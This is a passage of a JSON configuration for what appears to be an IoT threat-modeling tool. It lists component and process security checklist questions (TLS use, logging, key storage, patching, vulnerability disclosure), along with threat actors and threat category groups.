Backup","ID":"bd32d10e-82d6-4e7f-9247-fe2753908e60","Tooltip":"Does the device securely send logs to a central repository? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Passwords","ID":"025e828e-d1a0-4487-9c56-09fd6941d4b9","Tooltip":"Does the device log passwords?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Authentication Attempts","ID":"c7d5fd7a-4007-480c-a34b-cb32fab17472","Tooltip":"Are authentication attempts logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Changes in User Session","ID":"a154298a-d410-4da4-921d-906165cd5329","Tooltip":"Are user login, logout, and inactivity logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Firmware Changes","ID":"91abf825-cfca-4386-b5d5-8262423b090d","Tooltip":"Are changes to the firmware logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs User Management Changes","ID":"1a582358-45c2-42e2-a21e-61206a4eda7e","Tooltip":"Are user management changes logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Privilege Change","ID":"c86b6500-99cb-46e3-948f-b67b69c9768d","Tooltip":"Are privilege changes logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Configuration Changes","ID":"0bd863c2-5505-4226-9b28-bab9715c99d1","Tooltip":"Are configuration changes logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Warns User of Full Log File","ID":"95b793b3-b68f-4533-9dc0-4e7d414effe3","Tooltip":"Are users notified when the log file reaches its maximum size?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Time Synchronization","ID":"8643278b-1ab3-4359-9ab9-f3911bf336e6","Tooltip":"Does the system provide the ability to synchronize the system time?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","Name":"MQTT Client","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[{"DisplayName":"Uses TLS","ID":"6d7716ae-9870-46a1-9231-a713a0dcd5a0","Tooltip":"Are only messages on port 8883 sent (MQTT over TLS)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Client Authentication","ID":"de628891-642c-4b7c-b88b-abf7988721dc","Tooltip":"Is the client authenticated and authorized using its own X.509 certificate?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Name":"OPC UA","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[{"DisplayName":"HasSecureModel","ID":"4338e868-4e3c-4473-ba27-6148e8b1fc0f","Tooltip":"Is the security mode \'Sign\' or \'SignAndEncrypt\'?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"AuthenticatesUsers","ID":"1e3a8fb8-4a34-44be-8168-996a7e0283f1","Tooltip":"Are all users authenticated (identifier \'anonymous\' is not allowed)? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Uses Strong Crypto Algorithms","ID":"3f4c724d-3d4d-4b6b-9252-ef43b4240d79","Tooltip":"Is a strong security policy chosen that uses strong cryptographic algorithms?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Uses Certificates","ID":"34344cae-d072-4901-a7be-4084a2534b45","Tooltip":"Are only connections accepted that provide a trusted certificate?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"fe464818-7cef-4aba-9d18-0bc2357ca56c","Name":"PROFINET","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[]},{"ID":"2673ba36-ece0-462b-b115-0edb2c17828f","Name":"Modbus TCP","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[]},{"ID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Name":"Web Server","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[{"DisplayName":"Uses Secure Protocols","ID":"9ea829dc-59d5-437c-8d24-9908feac2941","Tooltip":"Does the sever use secure protocols?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Uses Secure TLS","ID":"aa99758d-30a6-4e0f-9d11-1d46c0f43d6c","Tooltip":"Does the server use at least TLS 1.2 and older versions of SSL/TLS are disabled?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Server Version Banner","ID":"6faf97a0-6039-4b7b-ba7c-6b9ef003ede3","Tooltip":"Has the server a version banner?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Regular Patches","ID":"defc6bcc-2bc9-457a-abab-666ec78d4f73","Tooltip":"Is the sever regular updated and patched?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Web Application Firewall","ID":"6f65b93f-53ad-424f-a81b-4777ad48ec97","Tooltip":"Does the system deploy a web application firewall (WAF)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is API Monitoring","ID":"b125fa52-c06e-4e54-88b5-5e9d3929f643","Tooltip":"Are all API calls monitored for potential API misuse?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Runs on Root","ID":"39de06c5-7cfc-4fb8-8a1f-22a8888cf4ed","Tooltip":"Is the service running with root privileges?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"a6659758-d5b9-47ab-961e-a77703652cf4","Name":"Mobile App API","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[]},{"ID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","Name":"User Application","Description":"","ComponentTypeID":1,"IsActive":false,"Properties":[{"DisplayName":"Follows Least Privilege Principal","ID":"03d7ff9f-bbdc-4938-974d-cd9766bdb8e0","Tooltip":"Does the application operate at the lowest privilege level that is possible, with access only to resources needed (least privilege principal)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Isolated","ID":"532fc4c6-b14f-4b9a-b033-f4aaf0d63e25","Tooltip":"Is the application isolated from others, e.g. using sandboxing techniques such as virtual machines, containerisation, or hardware mechansims? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Validates Input","ID":"1c1a93cf-acce-4f57-a210-e0b5058f57b8","Tooltip":"Is all data input sanitized and validated before processing?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"2d746c06-a57d-41af-9712-f9d8059425eb","Name":"Debugging","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Improper Access Control","ID":"f40ce61a-c823-4ca7-ab51-a70dbd9718a6","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Exposes Internal Assets","ID":"517b62dd-eea7-426e-82c6-2c458eed0aaf","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Unpublished Interface","ID":"311904f3-7898-4bab-ba74-e6024c704cd3","Tooltip":"Are the hidden interfaces that developers created with the intend to be not publicly available?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"6c83ccbc-ffbd-4bd6-b207-07386e3393c5","Name":"Hardware Abstraction","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Hardware Feature Restriction","ID":"4d88ce07-2a06-4ae3-942a-46eb25ccdd9b","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","Name":"Memory Management","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Allows Address Region Overlap","ID":"ca6a9224-153b-4c06-8c1b-4ea3333c8e92","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Clears Data on State Transition","ID":"16ab50f4-dd94-43dd-8480-37cae5c61043","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"463570ce-8495-4b4b-97fe-abed4942059a","Name":"Key Management","Description":"https://cheatsheetseries.owasp.org/cheatsheets/Key_Management_Cheat_Sheet.html#key-management-lifecycle-best-practices","Properties":[{"DisplayName":"Stores Keys in Security Module ","ID":"64bb2754-a187-47c8-aa93-e599f0a97a57","Tooltip":"Are keys stored in a cryptographic vault, such as a trusted platform module (TPM), secure element (SE), or hardware security module (HSM)? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Key Used In Trusted Environment","ID":"b43ada71-51c6-4f5e-b310-a1735a41e602","Tooltip":"Are cryptographic operations (such as key access, encryption, and signing) executed in a trusted environment (e.g. separate module)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Encrypts Keys","ID":"b6c0efb3-7db3-4dd8-8c60-620027eefa3e","Tooltip":"Are keys encrypted using a key encryption key (KEK)? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Verifies Certificate Chain","ID":"20b12b0e-4031-4eb3-ad39-f91489884490","Tooltip":"Is the entire certificate chain validated before trusting a certificate?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Enables Certificate Update","ID":"e09bd987-fbf4-4f3d-afeb-033e5bdcb7f8","Tooltip":"Is there a secure and reliable way to update certificates?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Enables Certificate Revocation","ID":"c9d634b6-7eb8-4210-9e97-58e93a5c09a0","Tooltip":"Is it possible to revoke a certificate / check a certificate against a revocation list?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":1,"IsActive":true},{"ID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Name":"WebSocket","Description":"https://devcenter.heroku.com/articles/websocket-security\\nhttps://brightsec.com/blog/websocket-security-top-vulnerabilities/","Properties":[{"DisplayName":"Uses WSS","ID":"cb908fd2-f59c-4f56-ac91-bc1192df5af0","Tooltip":"Is the secure wss:// protocol used over the unsecure ws:// protocol?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Tunneled","ID":"0d2c8df9-271f-42e2-b3fe-cb74719ff39b","Tooltip":"Is the connection tunneled to any other service (e.g. a database)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Validates Client Input","ID":"8cd86481-a82f-490d-8d62-2195981779e9","Tooltip":"Is client data validated before processing on the server?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Validates Server Data","ID":"92c3d3ef-aa2d-4920-978e-ff1755479308","Tooltip":"Is server data validated and parsed before processing on the client?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Implements Authentication","ID":"485ff476-0c99-41de-b90a-4fdd27730685","Tooltip":"Is authentication and authorization handled separately (e.g. ticket-based)? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Limits Connections","ID":"9616fd88-1e3d-4d72-9178-ad81d793a744","Tooltip":"Is the number of connections limited?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":1,"IsActive":false,"IsThirdParty":true}],"myComponentSWTypeGroups":[{"ID":"c91d3152-cf81-44d2-b65c-b9ab2cc0f8f9","Name":"Core","Description":"","myComponentTypeIDs":["551ef8ab-1707-4d4c-9845-c8dcc7515fe9","75752ec0-7fa9-41a9-a06a-edcf890ca569","ca502567-bafc-40f9-a5e4-8ce94780c3f6","9926788f-c85e-43ca-91e4-aa9c0f46656e","2d746c06-a57d-41af-9712-f9d8059425eb","6c83ccbc-ffbd-4bd6-b207-07386e3393c5","ea189855-6883-489f-a3d0-77d4ac51a6ef"],"ComponentTypeID":1},{"ID":"4845aa7b-55f5-44e5-9187-ac53964300d9","Name":"Base","Description":"","myComponentTypeIDs":["838f741c-120e-4b73-951a-d55a11d36ca4","f049724d-ed42-4c16-af4e-9bcacffc7f0b","44545d3e-fa0a-44c7-a19e-8164dab646dc","463570ce-8495-4b4b-97fe-abed4942059a","7e64d98b-ecbe-4921-9545-8b30d0f9bde8","02b94aae-efea-451e-a017-81be68db03d7"],"ComponentTypeID":1},{"ID":"af7ed765-9e95-4a90-8764-cdd33826003f","Name":"Connectivity","Description":"","myComponentTypeIDs":["693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","fe464818-7cef-4aba-9d18-0bc2357ca56c","2673ba36-ece0-462b-b115-0edb2c17828f","aa2ca59f-4045-4cb4-a25d-b23c4b456be5"],"ComponentTypeID":1},{"ID":"9a10995f-e765-487a-b357-51e22d7e5f6b","Name":"App","Description":"","myComponentTypeIDs":["ce3cdda1-0737-468e-83e7-ca20098551d1","a6659758-d5b9-47ab-961e-a77703652cf4","2ca79dc4-0a73-4fc2-859b-1b5701530183"],"ComponentTypeID":1}],"myComponentPTypes":[{"ID":"25032887-439e-4599-84bf-05d906641a0b","Name":"Incident Response","Description":"See IoT Security Foundation: Vulnerability Disclosure","ComponentTypeID":2,"IsActive":true,"Properties":[{"DisplayName":"Has Vulnerability Disclosure","ID":"dd2c4c41-45f0-4105-aea4-317943e2f435","Tooltip":"Does the manufacturer enable a coordinated vulnerability disclosure?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Bug Bounty Program","ID":"b4c47f35-bcd3-4b18-9b35-8a7f213dcca4","Tooltip":"Is there a bug bounty program?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Provide Timeline Info","ID":"e7d90cc4-822e-4aab-a161-c766cf13df22","Tooltip":"Is there information on the timelines for acknowledgement and resolution of reported issues?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Incident Response Team","ID":"263b5363-2c09-45dd-8ff8-1a430fb7e93a","Tooltip":"Is there a incident response team within the organization?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","Name":"Update and Patch Management","Description":"","Properties":[{"DisplayName":"Has End of Support Date","ID":"ec622fb4-b851-4c4f-94dc-d5f5b1a6f85d","Tooltip":"Is there a publicly available date for the end of support?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Update Interval Information","ID":"53ceef04-26a6-46a6-834d-bb9c0df2a24d","Tooltip":"Is a rough update interval publicly available for customers?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Update Notification Process","ID":"7da73f3c-b3f6-4d35-ae19-c60ed655b14c","Tooltip":"If updates are not applied automatically: is there a process for notifying customers about a new update?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"8902950a-6c5e-426b-baa2-71794e74f720","Name":"Penetration Testing","Description":"","Properties":[{"DisplayName":"Has Regular Pentests","ID":"d4cb3498-4689-49f2-9f37-8bd45e62a972","Tooltip":"Are penetration tests regularly (at least annually) performed?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has External Audits","ID":"5f7c116c-e2a5-49af-bfd6-9c38541b6a77","Tooltip":"Are audits regularly performed by external institutes?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Name":"Incident Detection","Description":"","Properties":[{"DisplayName":"Has Reporting System","ID":"23943ca9-3df9-4d69-a414-6d8fef99d30c","Tooltip":"Is there a public vulnerability reporting system?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has /security Page","ID":"36e1de4b-5129-470f-b06d-208ef7610da8","Tooltip":"Does the website of the manufacturer use /security to provide security-related topics?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Security.txt","ID":"3affc4da-9a78-43ec-990b-75d20edbc410","Tooltip":"Does the website of the manufacturer provide a security.txt including all security-related sites and contact information?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Contact Email Address","ID":"d94f2535-73f9-4c2d-aef1-57b1c9daaa5c","Tooltip":"Does the manufacturer provide an email account for security related topics?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Public Policy","ID":"0c7bdef9-6b56-42db-a22b-a460b08bb27d","Tooltip":"Is there are publicly available vulnerability disclosure policy?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has PGP Key","ID":"61d4b9c9-19a9-431e-b114-f2c04b48846b","Tooltip":"Does the manufacturer provide a PGP on their website for secure communication?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"44fd3f80-7e55-41af-b452-283556dd1894","Name":"Privacy Considerations","Description":"","Properties":[{"DisplayName":"Has PIA","ID":"8f4a0dd3-2083-42eb-89bd-48480a082342","Tooltip":"Is a privacy impact assessment conducted?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Regular PIA Update","ID":"f3d756ae-7451-4738-986c-0e15d22cb2b2","Tooltip":"Is the privacy impact assessment regularly updated (e.g. annually)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Privacy Measures","ID":"2a4c8bb7-bd16-4eee-847f-25090eac2d7e","Tooltip":"Are appropriate technical and operational measures (e. g. data pseudoymisation, data minimisation) implemented?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Compliant with Law","ID":"1bd8c924-5f59-42db-a9b2-a4527c46adf2","Tooltip":"Does the system comply with all privacy laws that govern user control over their personal data?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Protects User Rights","ID":"e79dc2a3-1af9-4a37-b649-9db68eacfc9f","Tooltip":"Does the system implement appropriate technical and operational measures for the protection of users rights and freedoms (e. g. transparent information, right of access, right to erasure)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Sufficient User Awareness","ID":"2dd7688c-eddf-4cfa-a496-8c1a46963c89","Tooltip":"Are users sufficiently aware what personal data is being exposed to the manufacturer, operator, and other partner organisations?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Opt-In Mechansim","ID":"d9b40dd2-e5eb-485d-9cf5-db2ac441c899","Tooltip":"Does the system implement an opt-int mechanism to get explicit user consent for personal data processing?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"be1f1524-fd62-4957-a08d-844b070dbb00","Name":"Safety Impact Assessment","Description":"Evaluate the safety impacts of an IoT system, log all safety risks, prioritize the risks, and implement mitigations for each risk. Incorporate device and environmental controls to enforce safety requirements, as necessary.","Properties":[{"DisplayName":"Has SIA","ID":"a1e7923f-848d-4532-b967-700925af1a77","Tooltip":"Is a safety impact assessment conducted?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Fault Tree Analysis","ID":"d0e4fa19-2b29-48b3-b81b-2be909af26d8","Tooltip":"Is a fault tree analysis conducted?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","Name":"Identity and Access Management","Description":"","Properties":[{"DisplayName":"Has Account Management","ID":"524e227d-483e-45ae-b002-3041d15fe7e9","Tooltip":"Is there a regular audit of the account management (user, administrator, etc.)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Certificate-based Authentication","ID":"330a4f44-1471-460d-889f-4f33a3b8ce72","Tooltip":"Is certificate-based authentication used to access the system?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Name":"Certificate Management","Description":"","Properties":[{"DisplayName":"Uses Short-dated Certificates ","ID":"40c05808-37a1-4394-a9d5-8491b55c3a9b","Tooltip":"Is the lifetime of operational certificates no longer than 3 years?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Revocation Process","ID":"083e93ef-da95-4064-a698-6fbd5cf997f5","Tooltip":"Is there a process for certificate revocation?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Management Policy","ID":"46d35b81-19e3-404e-9fe2-af5088971ffe","Tooltip":"Is there a certificate management policy (creation, processing, storage, etc.)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Automated Renewal Process","ID":"0c0d40fd-7f0a-412d-ae80-efce58906308","Tooltip":"Is there an automated process to renew certificates?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","Name":"Supply Chain Risk Management","Description":"","Properties":[{"DisplayName":"Has SCRM Program","ID":"7e3faca4-9b7a-4f8e-8fbe-cb461ca6870f","Tooltip":"Is there a established supply chain risk management program?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Third Party Monitoring","ID":"2614fc88-29cb-4d84-9902-5f7ca7f98410","Tooltip":"Are third party components (hardware, software) tracked, monitored, and regularly updated?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"ea8af3ca-0055-4d82-88af-711b356aec74","Name":"Secure Development","Description":"","Properties":[{"DisplayName":"Has SDL Program","ID":"e1cdca4d-c2a2-48a1-be0e-93af41cd458c","Tooltip":"Is a Secure Development Plan (SDL) implemented (e.g. based on ISO/IEC 27034)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Responsible Person For Reg. Compliance","ID":"9db73879-4ec7-46ae-a8d9-1b555aac6954","Tooltip":"Do you have a group and organization responsible for regulatory compliance of security, privacy and data protection, and safety? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Responsible Person For Security Compliance","ID":"f3a7b4b7-2ff8-45e8-be0e-321f8d9304a1","Tooltip":"Do you have a group responsible for security compliance and quality control?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Responsible Person For Auditing","ID":"8fda48d4-746b-4915-b0d2-55c9b68fbd99","Tooltip":"Do you have a responsible group for auditing?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Includes Testing","ID":"e6f155e1-51e1-4297-80d9-a6a3beef3657","Tooltip":"Does your SDL program include internal functional and security testing of the system?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Employee Training","ID":"976c15a1-9170-4a2b-a41c-f1dfb4688b1e","Tooltip":"Is there a holistic security training and awareness program for employees?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Regular Employee Training","ID":"f2e2201c-bd33-4dbd-a8ca-1f3a6d16eb9f","Tooltip":"Is there a continuous, regular and frequently security training for employees? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Secure Coding Guidelines","ID":"60fadd09-661b-494a-bcac-f0a652172a50","Tooltip":"Are secure coding guidelines implemented?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true}],"myComponentPTypeGroups":[{"ID":"152dc4f8-0f67-4967-bb95-0994a48082f3","Name":"Design & Implementation","Description":"","myComponentTypeIDs":["ea8af3ca-0055-4d82-88af-711b356aec74","44fd3f80-7e55-41af-b452-283556dd1894","be1f1524-fd62-4957-a08d-844b070dbb00","2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1"],"ComponentTypeID":2},{"ID":"d6257d70-4fbd-41a5-92d2-7dd7be9e447c","Name":"Security Management","Description":"","myComponentTypeIDs":["23a8870f-e7f4-4e07-80be-8cb890f509e8","34f3948e-4d7f-4f0b-a86b-e649c427bc8e"],"ComponentTypeID":2},{"ID":"a867f0e6-c920-4b9f-a6a9-0947780695b0","Name":"Update Management","Description":"","myComponentTypeIDs":["cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d"],"ComponentTypeID":2},{"ID":"55e4ff75-c735-40ef-a97d-031f4df2d4ec","Name":"Incident Management","Description":"","myComponentTypeIDs":["8aa599b0-9ee2-474f-974b-bbefa09896bd","25032887-439e-4599-84bf-05d906641a0b"],"ComponentTypeID":2},{"ID":"534fe08c-c722-40b6-b7d6-ed5deee2eebc","Name":"Security Verification","Description":"","myComponentTypeIDs":["8902950a-6c5e-426b-baa2-71794e74f720"],"ComponentTypeID":2}],"threatActors":[{"ID":"09ec9afa-906e-4383-be80-47de5c87bd4d","Name":"Cyber criminals","Description":"","Likelihood":2,"Motive":["Blackmail the victim to get money"],"Capabilities":[]},{"ID":"90cc276e-cfc5-4e37-afa0-b14f96f2d231","Name":"State-sponsored actors","Description":"","Likelihood":2,"Motive":["Citizen espionage","Disruption of critical infrastructures"],"Capabilities":[]},{"ID":"b5ee94b3-703f-4cdd-92bd-64bd73975cb8","Name":"Competitors","Description":"","Likelihood":2,"Motive":["Know-how theft"],"Capabilities":[]},{"ID":"127b2c1d-e8c5-4225-a03f-7169cceab3a9","Name":"Insiders / employees","Description":"","Likelihood":2,"Motive":["Financial gain","Anger"],"Capabilities":[]},{"ID":"445bb063-8765-4224-8c44-86b8c38d16e0","Name":"Hacktivists","Description":"","Likelihood":2,"Motive":[],"Capabilities":[]},{"ID":"d8135bb6-9891-4038-9fe8-707c9426b42b","Name":"Terrorists","Description":"","Likelihood":2,"Motive":[],"Capabilities":[]},{"ID":"b334caef-05f2-417f-a664-6a56ea83657d","Name":"Script kiddies","Description":"","Likelihood":2,"Motive":[],"Capabilities":[]}],"threatCategoryGroups":[{"ID":"9d6172db-e842-48e9-bb18-6137a6ae60ee","Name":"Nefarious Activity / Abuse / Misuse","Description":"","threatCategorieIDs":["2dcb00d0-d8a3-4dbc-9efa-d33783a8106b","f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","6de4f75a-bc96-4f32-b18f-867eac0e8fda","9e715340-1a69-47df-864a-7c3b5a9a678e","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},{"ID":"415f75e3-24f1-4d5f-9e0b-9e66b134d728","Name":"Attack Preparation / Persistence","Description":"","threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","c8a14b27-b13f-4358-9f3f-691d01c97c77","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"]},{"ID":"08340ecc-e53f-4ab6-8573-af18bcce9e92","Name":"Damage / Destruction / Harm / Loss","Description":"","threatCategorieIDs":["88d19822-b1b0-469f-ae00-1bc600ccaa1d","644f8521-6b49-41bc-86df-4064b89fb881","96bdc11d-dbb0-4785-8a5c-373e2c492eb0","3915215b-3414-4b2e-8446-9763398790ec","a6a57921-7fcb-4f54-b0f5-bac0a0f74163","bc4b439c-6197-48d3-a308-7fd323d2ea5e","6b8c08cb-3f02-413a-96b4-179bb1f67997","4d0bb854-2843-4d47-8b2c-043f7b8e4b4f","08d8fbba-5de4-4538-8674-43e214c3ebad"]},{"ID":"d44618e3-6f7e-48bd-ba5d-9cef76e4de29","Name":"Espionage / Interception / Tampering","Description":"","threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","61d04f2d-83b1-4152-9aba-4ad188eef06d","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},{"ID":"8cc887d4-ac13-4e73-a683-9ce3f7d108a2","Name":"Intellectual Property Theft","Description":"","threatCategorieIDs":["ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d","70d07015-4eda-4d1a-8d07-1791f881f8f0","2e50cdf4-cc94-4a32-98ee-825028a1f476"]},{"ID":"2c19e683-971c-4389-bf96-3963e6a1dd56","Name":"Legal","Description":"","threatCategorieIDs":["3bdf3019-02dd-4c7f-bffc-90189b39e6a7","180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","647ed950-8b8a-4a3f-b3f0-d9967c7d218f"]},{"ID":"6fb5aeac-180b-4ed5-b246-ad888cfd91aa","Name":"Malfunction / Failure","Description":"","threatCategorieIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a","0285f001-a384-42de-ae6d-6bfbc488c92c","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","b7935cfe-6a41-45e4-8778-f0fbb1e4018b","5f7607f8-e67d-40f2-a902-33c6cfe298c3","3fb90b77-a990-4d5b-bb8a-fce5e36d8f71"]},{"ID":"fdbef5e1-5195-4c19-9059-918c81091003","Name":"Outage","Description":"","threatCategorieIDs":["f2b91aaf-7d9f-4baf-8713-13d7625174d9","bafd3162-d833-4bf4-beb8-ce95239cb4b4","2c064bb4-aa49-4e20-ad72-333748a5e497","7cf3480c-f4db-47cb-be36-b27deb746c64"]},{"ID":"1f2b7a03-b882-47d8-a6c0-ae693145a60a","Name":"Privacy","Description":"","threatCategorieIDs":["bcd08af5-29bf-4ed8-ab6c-e311e88f4c84","d6eafa9e-6d9d-42aa-a734-0eb11f25607b","11a5c06f-875c-43fa-a01f-79f4819f98dd","787846f0-3f3c-4807-a99d-881383591051","2765e61e-29a9-498e-adf8-4d653f488e3d","af3ee78e-9e83-4bd1-b9b5-13ec28765518","e6ba8518-0074-492c-95e5-ebe89fa601fe"]},{"ID":"a07a29b8-0414-4d10-bf57-71dcb697d734","Name":"Unintentional / 